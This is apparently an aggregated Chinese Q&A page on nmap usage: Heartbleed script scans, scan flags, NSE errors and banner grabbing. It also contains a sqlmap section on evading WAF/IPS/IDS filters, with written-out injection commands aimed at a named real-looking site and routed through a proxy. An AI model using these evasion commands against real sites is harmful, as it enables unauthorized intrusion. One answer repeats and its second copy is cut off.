nse腳本
『壹』 ubuntu nmap漏洞怎麼用
nmap是linux平台上的漏洞掃描利器,你可以看一下這款軟體的說明。
比如在使用nmap 的過程中指定 ssl-heartbleed.nse 腳本來掃描探測,命令如下;
[[email protected] ~]#nmap -sV -p 443 --script=ssl-heartbleed.nse 192.168.1.5
或者
[[email protected] ~]#nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.5
解釋;其中 192.168.1.5 是要被掃描的ip,也可以換成域名
『貳』 kali Linux 中使用nmap。
使用 nmap 的第一步是登錄 Kali Linux,如果需要,就啟動一個圖形會話(本系列的第一篇文章安裝了 Kali Linux 的 Enlightenment 桌面環境)。
在安裝過程中,安裝程序將提示用戶輸入用來登錄的「root」用戶和密碼。 一旦登錄到 Kali Linux 機器,使用命令startx就可以啟動 Enlightenment 桌面環境 - 值得注意的是 nmap 不需要運行桌面環境。
# startx
Nmap – 在主機上完成網路掃描
注意這一次,使用一個命令,nmap 返回了很多關於在這台特定機器上運行的開放埠、服務和配置的信息。 這些信息中的大部分可用於幫助確定如何保護本機以及評估網路上可能運行的軟體。
這只是 nmap 可用於在主機或網段上找到的許多有用信息的很短的一個列表。
掃描目的主機防火牆是否關閉。沒開防火牆的:可以看到988個埠關閉,所以沒有打開防火牆。
開了防火牆的:可以看到983個被過濾的埠,所以打開了防火牆。
輸入「nmap+空格+域名或IP地址」進行的掃描時普通速度的掃描,時間較長。
輸入「nmap」+「空格」+「-F」+空格+「域名或IP地址」,進行的是加速掃描,時間較短。
同時掃描多個ip方法一:輸入「nmap+空格+IP地址段」。
輸入「nmap+空格+IP/子網段」。
輸入「nmap+空格+IP網路號+通配符*」。
掃描主機操作系統版本:輸入「nmap+空格+「-O」+空格+IP地址或域名。
掃描所有TCP埠:輸入「nmap+空格+「-sT」+空格+IP地址或域名」
掃描所有開放的UDP埠:輸入「nmap+空格+「-sU」+空格+IP地址或域名」
掃描防火牆安全漏洞:輸入「nmap+「-sN」+空格+IP地址或域名」
掃描使用IP協議的埠:輸入「nmap+空格+「-sO」+空格+IP地址或域名「
偵測各種遠程服務的版本號:輸入」nmap+空格+」sV」+空格+IP地址或域名」
掃描最常用的TCP埠:輸入「nmap+空格+」-sS」+空格+IP地址或域名」
掃描網段中活躍的主機:輸入「nmap+空格+」-sP」+空格+IP地址段
綜合掃描:輸入「nmap+空格+」-A」+IP地址或域名
建議看看《Linux就該這么學》這本書
『叄』 使用nmap進行掃描時,需要注意的問題是什麼
NSE 是nmap 腳本引擎的意思。NSE: Loaded 106 scripts for scanning. 意思是你導入了 106個lua腳本,一定是某個lua腳本中做了ARP掃描,nexthost: Failed to determine dst MAC address for target ####(這里是ip)這個錯誤應該是有ARP掃描的腳本錯誤造成的。
你首先檢測一下,不要使用lua腳本看看有沒有問題。比如說nmap -T4 -sT 127.0.0.1 如果不報錯,那就是lua腳本的問題。
如果你一定要學習lua腳本在NSE中的使用,你不要一次導入所有的腳本,一個一個事實。或者使用-vv 參數看一下詳細的日誌情況。
『肆』 利用sqlmap注入時,發現站點對空格進行了過濾,可以使用什麼腳本來繞過
0x00 前言
現在的網路環境往往是WAF/IPS/IDS保護著Web 伺服器等等,這種保護措施往往會過濾擋住我們的SQL注入查詢鏈接,甚至封鎖我們的主機IP,所以這個時候,我們就要考慮怎樣進行繞過,達到注入的目標。因為現在WAF/IPS/IDS都把sqlmap 列入黑名單了,呵呵!但是本文基於sqlmap 進行繞過注入測試,介紹至今仍然實用有效的技巧,以下策略在特定的環境能夠成功繞過,具體是否繞過,請仔細查看輸出的信息。
0x01 確認WAF
首先我們判斷該Web 伺服器是否被WAF/IPS/IDS保護著。這點很容易實現,因為我們在漏掃或者使用專門工具來檢測是否有WAF,這個檢測,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我們可以利用這些來判斷。在此我們,也介紹使用sqlmap 進行檢測是否有WAF/IPS/IDS
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首選
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#備選
0x02 使用參數進行繞過
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意瀏覽器進行繞過,尤其是在WAF配置不當的時候
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 參數污染進行繞過,尤其是在ASP.NET/IIS 平台上
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用長的延時來避免觸發WAF的機制,這方式比較耗時
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理進行注入
『伍』 nmap使用求助
NSE 是nmap 腳本引擎的意思。NSE: Loaded 106 scripts for scanning. 意思是你導入了 106個lua腳本,一定是某個lua腳本中做了ARP掃描,nexthost: Failed to determine dst MAC address for target ####(這里是ip)這個錯誤應該是有ARP掃描的腳
『陸』 banner是什麼,nmap里的。這句話什麼意思
這個問題要分,三步回答:
1,--script= 後面的參數名字,其實是文件名,文件在nmap的安裝目錄裡面比如說我的:C:\Program Files (x86)\Nmap\scripts,這個目錄裡面的文件。banner 就是banner.nse。nse就是nmap腳本引擎的意思(nmap script engine),作用是nmap使用lua腳本,對nmap的擴展。可以用nse腳本來構造自己的數據報文或者處理返回值。
2,banner是標志的意識,就是你訪問ftp的伺服器的時候伺服器返回給你的標題,banner掃描作用如下:
A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.
The banner will be truncated to fit into a single line, but an extra line may be printed for every
increase in the level of verbosity requested on the command line.
3,nmap -p 21 -sV --script=banner 192.168.1.111 的意思是:掃描192.168.1.111這個機器上的
21號埠的伺服器版本,並且使用 banner腳本來優化展示方式。